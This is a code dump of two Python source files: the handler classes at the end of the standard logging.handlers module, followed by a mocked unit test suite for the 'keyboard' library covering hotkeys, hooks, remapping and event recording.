"logging) appear not to be available.")
self._welu = None
def getMessageID(self, record):
"""
Return the message ID for the event record. If you are using your
own messages, you could do this by having the msg passed to the
logger being an ID rather than a formatting string. Then, in here,
you could use a dictionary lookup to get the message ID. This
version returns 1, which is the base message ID in win32service.pyd.
"""
return 1
def getEventCategory(self, record):
"""
Return the event category for the record.
Override this if you want to specify your own categories. This version
returns 0.
"""
return 0
def getEventType(self, record):
"""
Return the event type for the record.
Override this if you want to specify your own types. This version does
a mapping using the handler's typemap attribute, which is set up in
__init__() to a dictionary which contains mappings for DEBUG, INFO,
WARNING, ERROR and CRITICAL. If you are using your own levels you will
either need to override this method or place a suitable dictionary in
the handler's typemap attribute.
"""
return self.typemap.get(record.levelno, self.deftype)
def emit(self, record):
"""
Emit a record.
Determine the message ID, event category and event type. Then
log the message in the NT event log.
"""
if self._welu:
try:
id = self.getMessageID(record)
cat = self.getEventCategory(record)
type = self.getEventType(record)
msg = self.format(record)
self._welu.ReportEvent(self.appname, id, cat, type, [msg])
except Exception:
self.handleError(record)
def close(self):
"""
Clean up this handler.
You can remove the application name from the registry as a
source of event log entries. However, if you do this, you will
not be able to see the events as you intended in the Event Log
Viewer - it needs to be able to access the registry to get the
DLL name.
"""
#self._welu.RemoveSourceFromRegistry(self.appname, self.logtype)
logging.Handler.close(self)
class HTTPHandler(logging.Handler):
"""
A class which sends records to a Web server, using either GET or
POST semantics.
"""
def __init__(self, host, url, method="GET", secure=False, credentials=None,
context=None):
"""
Initialize the instance with the host, the request URL, and the method
("GET" or "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
if method not in ["GET", "POST"]:
raise ValueError("method must be GET or POST")
if not secure and context is not None:
raise ValueError("context parameter only makes sense "
"with secure=True")
self.host = host
self.url = url
self.method = method
self.secure = secure
self.credentials = credentials
self.context = context
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
that is sent as the CGI data. Overwrite in your class.
Contributed by Franz Glasner.
"""
return record.__dict__
def emit(self, record):
"""
Emit a record.
Send the record to the Web server as a percent-encoded dictionary
"""
try:
import http.client, urllib.parse
host = self.host
if self.secure:
h = http.client.HTTPSConnection(host, context=self.context)
else:
h = http.client.HTTPConnection(host)
url = self.url
data = urllib.parse.urlencode(self.mapLogRecord(record))
if self.method == "GET":
if (url.find('?') >= 0):
sep = '&'
else:
sep = '?'
url = url + "%c%s" % (sep, data)
h.putrequest(self.method, url)
# support multiple hosts on one IP address...
# need to strip optional :port from host, if present
i = host.find(":")
if i >= 0:
host = host[:i]
h.putheader("Host", host)
if self.method == "POST":
h.putheader("Content-type",
"application/x-www-form-urlencoded")
h.putheader("Content-length", str(len(data)))
if self.credentials:
import base64
s = ('u%s:%s' % self.credentials).encode('utf-8')
s = 'Basic ' + base64.b64encode(s).strip()
h.putheader('Authorization', s)
h.endheaders()
if self.method == "POST":
h.send(data.encode('utf-8'))
h.getresponse() #can't do anything with the result
except Exception:
self.handleError(record)
class BufferingHandler(logging.Handler):
"""
A handler class which buffers logging records in memory. Whenever each
record is added to the buffer, a check is made to see if the buffer should
be flushed. If it should, then flush() is expected to do what's needed.
"""
def __init__(self, capacity):
"""
Initialize the handler with the buffer size.
"""
logging.Handler.__init__(self)
self.capacity = capacity
self.buffer = []
def shouldFlush(self, record):
"""
Should the handler flush its buffer?
Returns true if the buffer is up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
return (len(self.buffer) >= self.capacity)
def emit(self, record):
"""
Emit a record.
Append the record. If shouldFlush() tells us to, call flush() to process
the buffer.
"""
self.buffer.append(record)
if self.shouldFlush(record):
self.flush()
def flush(self):
"""
Override to implement custom flushing behaviour.
This version just zaps the buffer to empty.
"""
self.acquire()
try:
self.buffer = []
finally:
self.release()
def close(self):
"""
Close the handler.
This version just flushes and chains to the parent class' close().
"""
try:
self.flush()
finally:
logging.Handler.close(self)
class MemoryHandler(BufferingHandler):
"""
A handler class which buffers logging records in memory, periodically
flushing them to a target handler. Flushing occurs whenever the buffer
is full, or when an event of a certain severity or greater is seen.
"""
def __init__(self, capacity, flushLevel=logging.ERROR, target=None):
"""
Initialize the handler with the buffer size, the level at which
flushing should occur and an optional target.
Note that without a target being set either here or via setTarget(),
a MemoryHandler is no use to anyone!
"""
BufferingHandler.__init__(self, capacity)
self.flushLevel = flushLevel
self.target = target
def shouldFlush(self, record):
"""
Check for buffer full or a record at the flushLevel or higher.
"""
return (len(self.buffer) >= self.capacity) or \
(record.levelno >= self.flushLevel)
def setTarget(self, target):
"""
Set the target handler for this handler.
"""
self.target = target
def flush(self):
"""
For a MemoryHandler, flushing means just sending the buffered
records to the target, if there is one. Override if you want
different behaviour.
The record buffer is also cleared by this operation.
"""
self.acquire()
try:
if self.target:
for record in self.buffer:
self.target.handle(record)
self.buffer = []
finally:
self.release()
def close(self):
"""
Flush, set the target to None and lose the buffer.
"""
try:
self.flush()
finally:
self.acquire()
try:
self.target = None
BufferingHandler.close(self)
finally:
self.release()
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy pasted into
user code for use with earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also puts the message into
# record.message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info attribute, as it's no longer needed and, if not None,
# will typically not be pickleable.
self.format(record)
record.msg = record.message
record.args = None
record.exc_info = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except Exception:
self.handleError(record)
if threading:
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
"""
_sentinel = None
def __init__(self, queue, *handlers, respect_handler_level=False):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._stop = threading.Event()
self._thread = None
self.respect_handler_level = respect_handler_level
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses get. You may want to override this method
if you want to use timeouts or work with custom queue implementations.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.setDaemon(True)
t.start()
def prepare(self , record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
if not self.respect_handler_level:
process = True
else:
process = record.levelno >= handler.level
if process:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while not self._stop.isSet():
try:
record = self.dequeue(True)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
pass
# There might still be records in the queue.
while True:
try:
record = self.dequeue(False)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
This is used to enqueue the sentinel record.
The base implementation uses put_nowait. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self._stop.set()
self.enqueue_sentinel()
self._thread.join()
self._thread = None
|
_keyboard_tests.py
|
# -*- coding: utf-8 -*-
"""
Side effects are avoided using two techniques:
- Low level OS requests (keyboard._os_keyboard) are mocked out by rewriting
the functions at that namespace. This includes a list of dummy keys.
- Events are pumped manually by the main test class, and accepted events
are tested against expected values.
Fake user events are appended to `input_events`, passed through
keyboard,_listener.direct_callback, then, if accepted, appended to
`output_events`. Fake OS events (keyboard.press) are processed
and added to `output_events` immediately, mimicking real functionality.
"""
from __future__ import print_function
import unittest
import time
import keyboard
from ._keyboard_event import KeyboardEvent, KEY_DOWN, KEY_UP
dummy_keys = {
'space': [(0, [])],
'a': [(1, [])],
'b': [(2, [])],
'c': [(3, [])],
'A': [(1, ['shift']), (-1, [])],
'B': [(2, ['shift']), (-2, [])],
'C': [(3, ['shift']), (-3, [])],
'alt': [(4, [])],
'left alt': [(4, [])],
'left shift': [(5, [])],
'right shift': [(6, [])],
'left ctrl': [(7, [])],
'backspace': [(8, [])],
'caps lock': [(9, [])],
'+': [(10, [])],
',': [(11, [])],
'_': [(12, [])],
'none': [],
'duplicated': [(20, []), (20, [])],
}
def make_event(event_type, name, scan_code=None, time=0):
return KeyboardEvent(event_type=event_type, scan_code=scan_code or dummy_keys[name][0][0], name=name, time=time)
# Used when manually pumping events.
input_events = []
output_events = []
def send_instant_event(event):
if keyboard._listener.direct_callback(event):
output_events.append(event)
# Mock out side effects.
keyboard._os_keyboard.init = lambda: None
keyboard._os_keyboard.listen = lambda callback: None
keyboard._os_keyboard.map_name = dummy_keys.__getitem__
keyboard._os_keyboard.press = lambda scan_code: send_instant_event(make_event(KEY_DOWN, None, scan_code))
keyboard._os_keyboard.release = lambda scan_code: send_instant_event(make_event(KEY_UP, None, scan_code))
keyboard._os_keyboard.type_unicode = lambda char: output_events.append(KeyboardEvent(event_type=KEY_DOWN, scan_code=999, name=char))
# Shortcuts for defining test inputs and expected outputs.
# Usage: d_shift + d_a + u_a + u_shift
d_a = [make_event(KEY_DOWN, 'a')]
u_a = [make_event(KEY_UP, 'a')]
du_a = d_a+u_a
d_b = [make_event(KEY_DOWN, 'b')]
u_b = [make_event(KEY_UP, 'b')]
du_b = d_b+u_b
d_c = [make_event(KEY_DOWN, 'c')]
u_c = [make_event(KEY_UP, 'c')]
du_c = d_c+u_c
d_ctrl = [make_event(KEY_DOWN, 'left ctrl')]
u_ctrl = [make_event(KEY_UP, 'left ctrl')]
du_ctrl = d_ctrl+u_ctrl
d_shift = [make_event(KEY_DOWN, 'left shift')]
u_shift = [make_event(KEY_UP, 'left shift')]
du_shift = d_shift+u_shift
d_alt = [make_event(KEY_DOWN, 'alt')]
u_alt = [make_event(KEY_UP, 'alt')]
du_alt = d_alt+u_alt
du_backspace = [make_event(KEY_DOWN, 'backspace'), make_event(KEY_UP, 'backspace')]
du_capslock = [make_event(KEY_DOWN, 'caps lock'), make_event(KEY_UP, 'caps lock')]
d_space = [make_event(KEY_DOWN, 'space')]
u_space = [make_event(KEY_UP, 'space')]
du_space = [make_event(KEY_DOWN, 'space'), make_event(KEY_UP, 'space')]
trigger = lambda e=None: keyboard.press(999)
triggered_event = [KeyboardEvent(KEY_DOWN, scan_code=999)]
class TestKeyboard(unittest.TestCase):
def tearDown(self):
keyboard.unhook_all()
#self.assertEquals(keyboard._hooks, {})
#self.assertEquals(keyboard._hotkeys, {})
def setUp(self):
#keyboard._hooks.clear()
#keyboard._hotkeys.clear()
del input_events[:]
del output_events[:]
keyboard._recording = None
keyboard._pressed_events.clear()
keyboard._physically_pressed_keys.clear()
keyboard._logically_pressed_keys.clear()
keyboard._hotkeys.clear()
keyboard._listener.init()
keyboard._word_listeners = {}
def do(self, manual_events, expected=None):
input_events.extend(manual_events)
while input_events:
event = input_events.pop(0)
if keyboard._listener.direct_callback(event):
output_events.append(event)
if expected is not None:
to_names = lambda es: '+'.join(('d' if e.event_type == KEY_DOWN else 'u') + '_' + str(e.scan_code) for e in es)
self.assertEqual(to_names(output_events), to_names(expected))
del output_events[:]
keyboard._listener.queue.join()
def test_event_json(self):
event = make_event(KEY_DOWN, u'á \'"', 999)
import json
self.assertEqual(event, KeyboardEvent(**json.loads(event.to_json())))
def test_is_modifier_name(self):
for name in keyboard.all_modifiers:
self.assertTrue(keyboard.is_modifier(name))
def test_is_modifier_scan_code(self):
for i in range(10):
self.assertEqual(keyboard.is_modifier(i), i in [4, 5, 6, 7])
def test_key_to_scan_codes_brute(self):
for name, entries in dummy_keys.items():
if name in ['none', 'duplicated']: continue
expected = tuple(scan_code for scan_code, modifiers in entries)
self.assertEqual(keyboard.key_to_scan_codes(name), expected)
def test_key_to_scan_code_from_scan_code(self):
for i in range(10):
self.assertEqual(keyboard.key_to_scan_codes(i), (i,))
def test_key_to_scan_code_from_letter(self):
self.assertEqual(keyboard.key_to_scan_codes('a'), (1,))
self.assertEqual(keyboard.key_to_scan_codes('A'), (1,-1))
def test_key_to_scan_code_from_normalized(self):
self.assertEqual(keyboard.key_to_scan_codes('shift'), (5,6))
self.assertEqual(keyboard.key_to_scan_codes('SHIFT'), (5,6))
self.assertEqual(keyboard.key_to_scan_codes('ctrl'), keyboard.key_to_scan_codes('CONTROL'))
def test_key_to_scan_code_from_sided_modifier(self):
self.assertEqual(keyboard.key_to_scan_codes('left shift'), (5,))
self.assertEqual(keyboard.key_to_scan_codes('right shift'), (6,))
def test_key_to_scan_code_underscores(self):
self.assertEqual(keyboard.key_to_scan_codes('_'), (12,))
self.assertEqual(keyboard.key_to_scan_codes('right_shift'), (6,))
def test_key_to_scan_code_error_none(self):
with self.assertRaises(ValueError):
keyboard.key_to_scan_codes(None)
def test_key_to_scan_code_error_empty(self):
with self.assertRaises(ValueError):
keyboard.key_to_scan_codes('')
def test_key_to_scan_code_error_other(self):
with self.assertRaises(ValueError):
keyboard.key_to_scan_codes({})
def test_key_to_scan_code_list(self):
self.assertEqual(keyboard.key_to_scan_codes([10, 5, 'a']), (10, 5, 1))
def test_key_to_scan_code_empty(self):
with self.assertRaises(ValueError):
keyboard.key_to_scan_codes('none')
def test_key_to_scan_code_duplicated(self):
self.assertEqual(keyboard.key_to_scan_codes('duplicated'), (20,))
def test_parse_hotkey_simple(self):
self.assertEqual(keyboard.parse_hotkey('a'), (((1,),),))
self.assertEqual(keyboard.parse_hotkey('A'), (((1,-1),),))
def test_parse_hotkey_separators(self):
self.assertEqual(keyboard.parse_hotkey('+'), keyboard.parse_hotkey('plus'))
self.assertEqual(keyboard.parse_hotkey(','), keyboard.parse_hotkey('comma'))
def test_parse_hotkey_keys(self):
self.assertEqual(keyboard.parse_hotkey('left shift + a'), (((5,), (1,),),))
self.assertEqual(keyboard.parse_hotkey('left shift+a'), (((5,), (1,),),))
def test_parse_hotkey_simple_steps(self):
self.assertEqual(keyboard.parse_hotkey('a,b'), (((1,),),((2,),)))
self.assertEqual(keyboard.parse_hotkey('a, b'), (((1,),),((2,),)))
def test_parse_hotkey_steps(self):
self.assertEqual(keyboard.parse_hotkey('a+b, b+c'), (((1,),(2,)),((2,),(3,))))
def test_parse_hotkey_example(self):
alt_codes = keyboard.key_to_scan_codes('alt')
shift_codes = keyboard.key_to_scan_codes('shift')
a_codes = keyboard.key_to_scan_codes('a')
b_codes = keyboard.key_to_scan_codes('b')
c_codes = keyboard.key_to_scan_codes('c')
self.assertEqual(keyboard.parse_hotkey("alt+shift+a, alt+b, c"), ((alt_codes, shift_codes, a_codes), (alt_codes, b_codes), (c_codes,)))
def test_parse_hotkey_list_scan_codes(self):
self.assertEqual(keyboard.parse_hotkey([1, 2, 3]), (((1,), (2,), (3,)),))
def test_parse_hotkey_deep_list_scan_codes(self):
result = keyboard.parse_hotkey('a')
self.assertEqual(keyboard.parse_hotkey(result), (((1,),),))
def test_parse_hotkey_list_names(self):
self.assertEqual(keyboard.parse_hotkey(['a', 'b', 'c']), (((1,), (2,), (3,)),))
def test_is_pressed_none(self):
self.assertFalse(keyboard.is_pressed('a'))
def test_is_pressed_true(self):
self.do(d_a)
self.assertTrue(keyboard.is_pressed('a'))
def test_is_pressed_true_scan_code_true(self):
self.do(d_a)
self.assertTrue(keyboard.is_pressed(1))
def test_is_pressed_true_scan_code_false(self):
self.do(d_a)
self.assertFalse(keyboard.is_pressed(2))
def test_is_pressed_true_scan_code_invalid(self):
self.do(d_a)
self.assertFalse(keyboard.is_pressed(-1))
def test_is_pressed_false(self):
self.do(d_a+u_a+d_b)
self.assertFalse(keyboard.is_pressed('a'))
self.assertTrue(keyboard.is_pressed('b'))
def test_is_pressed_hotkey_true(self):
self.do(d_shift+d_a)
self.assertTrue(keyboard.is_pressed('shift+a'))
def test_is_pressed_hotkey_false(self):
self.do(d_shift+d_a+u_a)
self.assertFalse(keyboard.is_pressed('shift+a'))
def test_is_pressed_multi_step_fail(self):
self.do(u_a+d_a)
with self.assertRaises(ValueError):
keyboard.is_pressed('a, b')
def test_send_single_press_release(self):
keyboard.send('a', do_press=True, do_release=True)
self.do([], d_a+u_a)
def test_send_single_press(self):
keyboard.send('a', do_press=True, do_release=False)
self.do([], d_a)
def test_send_single_release(self):
keyboard.send('a', do_press=False, do_release=True)
self.do([], u_a)
def test_send_single_none(self):
keyboard.send('a', do_press=False, do_release=False)
self.do([], [])
def test_press(self):
keyboard.press('a')
self.do([], d_a)
def test_release(self):
keyboard.release('a')
self.do([], u_a)
def test_press_and_release(self):
keyboard.press_and_release('a')
self.do([], d_a+u_a)
def test_send_modifier_press_release(self):
keyboard.send('ctrl+a', do_press=True, do_release=True)
self.do([], d_ctrl+d_a+u_a+u_ctrl)
def test_send_modifiers_release(self):
keyboard.send('ctrl+shift+a', do_press=False, do_release=True)
self.do([], u_a+u_shift+u_ctrl)
def test_call_later(self):
triggered = []
def fn(arg1, arg2):
assert arg1 == 1 and arg2 == 2
triggered.append(True)
keyboard.call_later(fn, (1, 2), 0.01)
self.assertFalse(triggered)
time.sleep(0.05)
self.assertTrue(triggered)
def test_hook_nonblocking(self):
self.i = 0
def count(e):
self.assertEqual(e.name, 'a')
self.i += 1
hook = keyboard.hook(count, suppress=False)
self.do(d_a+u_a, d_a+u_a)
self.assertEqual(self.i, 2)
keyboard.unhook(hook)
self.do(d_a+u_a, d_a+u_a)
self.assertEqual(self.i, 2)
keyboard.hook(count, suppress=False)
self.do(d_a+u_a, d_a+u_a)
self.assertEqual(self.i, 4)
keyboard.unhook_all()
self.do(d_a+u_a, d_a+u_a)
self.assertEqual(self.i, 4)
def test_hook_blocking(self):
self.i = 0
def count(e):
self.assertIn(e.name, ['a', 'b'])
self.i += 1
return e.name == 'b'
hook = keyboard.hook(count, suppress=True)
self.do(d_a+d_b, d_b)
self.assertEqual(self.i, 2)
keyboard.unhook(hook)
self.do(d_a+d_b, d_a+d_b)
self.assertEqual(self.i, 2)
keyboard.hook(count, suppress=True)
self.do(d_a+d_b, d_b)
self.assertEqual(self.i, 4)
keyboard.unhook_all()
self.do(d_a+d_b, d_a+d_b)
self.assertEqual(self.i, 4)
def test_on_press_nonblocking(self):
keyboard.on_press(lambda e: self.assertEqual(e.name, 'a') and self.assertEqual(e.event_type, KEY_DOWN))
self.do(d_a+u_a)
def test_on_press_blocking(self):
keyboard.on_press(lambda e: e.scan_code == 1, suppress=True)
self.do([make_event(KEY_DOWN, 'A', -1)] + d_a, d_a)
def test_on_release(self):
keyboard.on_release(lambda e: self.assertEqual(e.name, 'a') and self.assertEqual(e.event_type, KEY_UP))
self.do(d_a+u_a)
def test_hook_key_invalid(self):
with self.assertRaises(ValueError):
keyboard.hook_key('invalid', lambda e: None)
def test_hook_key_nonblocking(self):
self.i = 0
def count(event):
self.i += 1
hook = keyboard.hook_key('A', count)
self.do(d_a)
self.assertEqual(self.i, 1)
self.do(u_a+d_b)
self.assertEqual(self.i, 2)
self.do([make_event(KEY_DOWN, 'A', -1)])
self.assertEqual(self.i, 3)
keyboard.unhook_key(hook)
self.do(d_a)
self.assertEqual(self.i, 3)
def test_hook_key_blocking(self):
self.i = 0
def count(event):
self.i += 1
return event.scan_code == 1
hook = keyboard.hook_key('A', count, suppress=True)
self.do(d_a, d_a)
self.assertEqual(self.i, 1)
self.do(u_a+d_b, u_a+d_b)
self.assertEqual(self.i, 2)
self.do([make_event(KEY_DOWN, 'A', -1)], [])
self.assertEqual(self.i, 3)
keyboard.unhook_key(hook)
self.do([make_event(KEY_DOWN, 'A', -1)], [make_event(KEY_DOWN, 'A', -1)])
self.assertEqual(self.i, 3)
def test_on_press_key_nonblocking(self):
keyboard.on_press_key('A', lambda e: self.assertEqual(e.name, 'a') and self.assertEqual(e.event_type, KEY_DOWN))
self.do(d_a+u_a+d_b+u_b)
def test_on_press_key_blocking(self):
keyboard.on_press_key('A', lambda e: e.scan_code == 1, suppress=True)
self.do([make_event(KEY_DOWN, 'A', -1)] + d_a, d_a)
def test_on_release_key(self):
keyboard.on_release_key('a', lambda e: self.assertEqual(e.name, 'a') and self.assertEqual(e.event_type, KEY_UP))
self.do(d_a+u_a)
def test_block_key(self):
blocked = keyboard.block_key('a')
self.do(d_a+d_b, d_b)
self.do([make_event(KEY_DOWN, 'A', -1)], [make_event(KEY_DOWN, 'A', -1)])
keyboard.unblock_key(blocked)
self.do(d_a+d_b, d_a+d_b)
def test_block_key_ambiguous(self):
keyboard.block_key('A')
self.do(d_a+d_b, d_b)
self.do([make_event(KEY_DOWN, 'A', -1)], [])
def test_remap_key_simple(self):
mapped = keyboard.remap_key('a', 'b')
self.do(d_a+d_c+u_a, d_b+d_c+u_b)
keyboard.unremap_key(mapped)
self.do(d_a+d_c+u_a, d_a+d_c+u_a)
def test_remap_key_ambiguous(self):
keyboard.remap_key('A', 'b')
self.do(d_a+d_b, d_b+d_b)
self.do([make_event(KEY_DOWN, 'A', -1)], d_b)
def test_remap_key_multiple(self):
mapped = keyboard.remap_key('a', 'shift+b')
self.do(d_a+d_c+u_a, d_shift+d_b+d_c+u_b+u_shift)
keyboard.unremap_key(mapped)
self.do(d_a+d_c+u_a, d_a+d_c+u_a)
def test_stash_state(self):
self.do(d_a+d_shift)
self.assertEqual(sorted(keyboard.stash_state()), [1, 5])
self.do([], u_a+u_shift)
def test_restore_state(self):
self.do(d_b)
keyboard.restore_state([1, 5])
self.do([], u_b+d_a+d_shift)
def test_restore_modifieres(self):
self.do(d_b)
keyboard.restore_modifiers([1, 5])
self.do([], u_b+d_shift)
def test_write_simple(self):
keyboard.write('a', exact=False)
self.do([], d_a+u_a)
def test_write_multiple(self):
keyboard.write('ab', exact=False)
self.do([], d_a+u_a+d_b+u_b)
def test_write_modifiers(self):
keyboard.write('Ab', exact=False)
self.do([], d_shift+d_a+u_a+u_shift+d_b+u_b)
# restore_state_after has been removed after the introduction of `restore_modifiers`.
#def test_write_stash_not_restore(self):
# self.do(d_shift)
# keyboard.write('a', restore_state_after=False, exact=False)
# self.do([], u_shift+d_a+u_a)
def test_write_stash_restore(self):
self.do(d_shift)
keyboard.write('a', exact=False)
self.do([], u_shift+d_a+u_a+d_shift)
def test_write_multiple(self):
last_time = time.time()
keyboard.write('ab', delay=0.01, exact=False)
self.do([], d_a+u_a+d_b+u_b)
self.assertGreater(time.time() - last_time, 0.015)
def test_write_unicode_explicit(self):
keyboard.write('ab', exact=True)
self.do([], [KeyboardEvent(event_type=KEY_DOWN, scan_code=999, name='a'), KeyboardEvent(event_type=KEY_DOWN, scan_code=999, name='b')])
def test_write_unicode_fallback(self):
keyboard.write(u'áb', exact=False)
self.do([], [KeyboardEvent(event_type=KEY_DOWN, scan_code=999, name=u'á')]+d_b+u_b)
def test_start_stop_recording(self):
keyboard.start_recording()
self.do(d_a+u_a)
self.assertEqual(keyboard.stop_recording(), d_a+u_a)
def test_stop_recording_error(self):
with self.assertRaises(ValueError):
keyboard.stop_recording()
def test_record(self):
queue = keyboard._queue.Queue()
def process():
queue.put(keyboard.record('space', suppress=True))
from threading import Thread
t = Thread(target=process)
t.daemon = True
t.start()
# 0.01s sleep failed once already. Better solutions?
time.sleep(0.01)
self.do(du_a+du_b+du_space, du_a+du_b)
self.assertEqual(queue.get(timeout=0.5), du_a+du_b+du_space)
def test_play_nodelay(self):
keyboard.play(d_a+u_a, 0)
self.do([], d_a+u_a)
def test_play_stash(self):
self.do(d_ctrl)
keyboard.play(d_a+u_a, 0)
self.do([], u_ctrl+d_a+u_a+d_ctrl)
def test_play_delay(self):
last_time = time.time()
events = [make_event(KEY_DOWN, 'a', 1, 100), make_event(KEY_UP, 'a', 1, 100.01)]
keyboard.play(events, 1)
self.do([], d_a+u_a)
self.assertGreater(time.time() - last_time, 0.005)
def test_get_typed_strings_simple(self):
events = du_a+du_b+du_backspace+d_shift+du_a+u_shift+du_space+du_ctrl+du_a
self.assertEqual(list(keyboard.get_typed_strings(events)), ['aA ', 'a'])
def test_get_typed_strings_backspace(self):
events = du_a+du_b+du_backspace
self.assertEqual(list(keyboard.get_typed_strings(events)), ['a'])
events = du_backspace+du_a+du_b
self.assertEqual(list(keyboard.get_typed_strings(events)), ['ab'])
def test_get_typed_strings_shift(self):
events = d_shift+du_a+du_b+u_shift+du_space+du_ctrl+du_a
self.assertEqual(list(keyboard.get_typed_strings(events)), ['AB ', 'a'])
def test_get_typed_strings_all(self):
events = du_a+du_b+du_backspace+d_shift+du_a+du_capslock+du_b+u_shift+du_space+du_ctrl+du_a
self.assertEqual(list(keyboard.get_typed_strings(events)), ['aAb ', 'A'])
def test_get_hotkey_name_simple(self):
self.assertEqual(keyboard.get_hotkey_name(['a']), 'a')
def test_get_hotkey_name_modifiers(self):
self.assertEqual(keyboard.get_hotkey_name(['a', 'shift', 'ctrl']), 'ctrl+shift+a')
def test_get_hotkey_name_normalize(self):
self.assertEqual(keyboard.get_hotkey_name(['SHIFT', 'left ctrl']), 'ctrl+shift')
def test_get_hotkey_name_plus(self):
self.assertEqual(keyboard.get_hotkey_name(['+']), 'plus')
def test_get_hotkey_name_duplicated(self):
self.assertEqual(keyboard.get_hotkey_name(['+', 'plus']), 'plus')
def test_get_hotkey_name_full(self):
self.assertEqual(keyboard.get_hotkey_name(['+', 'left ctrl', 'shift', 'WIN', 'right alt']), 'ctrl+alt+shift+windows+plus')
def test_get_hotkey_name_multiple(self):
self.assertEqual(keyboard.get_hotkey_name(['ctrl', 'b', '!', 'a']), 'ctrl+!+a+b')
def test_get_hotkey_name_from_pressed(self):
self.do(du_c+d_ctrl+d_a+d_b)
self.assertEqual(keyboard.get_hotkey_name(), 'ctrl+a+b')
def test_read_hotkey(self):
queue = keyboard._queue.Queue()
def process():
queue.put(keyboard.read_hotkey())
from threading import Thread
t = Thread(target=process)
t.daemon = True
t.start()
time.sleep(0.01)
self.do(d_ctrl+d_a+d_b+u_ctrl)
self.assertEqual(queue.get(timeout=0.5), 'ctrl+a+b')
def test_read_event(self):
queue = keyboard._queue.Queue()
def process():
queue.put(keyboard.read_event(suppress=True))
from threading import Thread
t = Thread(target=process)
t.daemon = True
t.start()
time.sleep(0.01)
self.do(d_a, [])
self.assertEqual(queue.get(timeout=0.5), d_a[0])
def test_read_key(self):
queue = keyboard._queue.Queue()
def process():
queue.put(keyboard.read_key(suppress=True))
from threading import Thread
t = Thread(target=process)
t.daemon = True
t.start()
time.sleep(0.01)
self.do(d_a, [])
self.assertEqual(queue.get(timeout=0.5), 'a')
def test_wait_infinite(self):
self.triggered = False
def process():
keyboard.wait()
self.triggered = True
from threading import Thread
t = Thread(target=process)
t.daemon = True # Yep, we are letting this thread loose.
t.start()
time.sleep(0.01)
self.assertFalse(self.triggered)
def test_wait_until_success(self):
queue = keyboard._queue.Queue()
def process():
queue.put(keyboard.wait(queue.get(timeout=0.5), suppress=True) or True)
from threading import Thread
t = Thread(target=process)
t.daemon = True
t.start()
queue.put('a')
time.sleep(0.01)
self.do(d_a, [])
self.assertTrue(queue.get(timeout=0.5))
def test_wait_until_fail(self):
def process():
keyboard.wait('a', suppress=True)
self.fail()
from threading import Thread
t = Thread(target=process)
t.daemon = True # Yep, we are letting this thread loose.
t.start()
time.sleep(0.01)
self.do(d_b)
def test_add_hotkey_single_step_suppress_allow(self):
keyboard.add_hotkey('a', lambda: trigger() or True, suppress=True)
self.do(d_a, triggered_event+d_a)
def test_add_hotkey_single_step_suppress_args_allow(self):
arg = object()
keyboard.add_hotkey('a', lambda a: self.assertIs(a, arg) or trigger() or True, args=(arg,), suppress=True)
self.do(d_a, triggered_event+d_a)
def test_add_hotkey_single_step_suppress_single(self):
keyboard.add_hotkey('a', trigger, suppress=True)
self.do(d_a, triggered_event)
def test_add_hotkey_single_step_suppress_removed(self):
keyboard.remove_hotkey(keyboard.add_hotkey('a', trigger, suppress=True))
self.do(d_a, d_a)
def test_add_hotkey_single_step_suppress_removed(self):
keyboard.remove_hotkey(keyboard.add_hotkey('ctrl+a', trigger, suppress=True))
self.do(d_ctrl+d_a, d_ctrl+d_a)
self.assertEqual(keyboard._listener.filtered_modifiers[dummy_keys['left ctrl'][0][0]], 0)
def test_remove_hotkey_internal(self):
remove = keyboard.add_hotkey('shift+a', trigger, suppress=True)
self.assertTrue(all(keyboard._listener.blocking_hotkeys.values()))
self.assertTrue(all(keyboard._listener.filtered_modifiers.values()))
self.assertNotEqual(keyboard._hotkeys, {})
remove()
self.assertTrue(not any(keyboard._listener.filtered_modifiers.values()))
self.assertTrue(not any(keyboard._listener.blocking_hotkeys.values()))
self.assertEqual(keyboard._hotkeys, {})
def test_remove_hotkey_internal_multistep_start(self):
remove = keyboard.add_hotkey('shift+a, b', trigger, suppress=True)
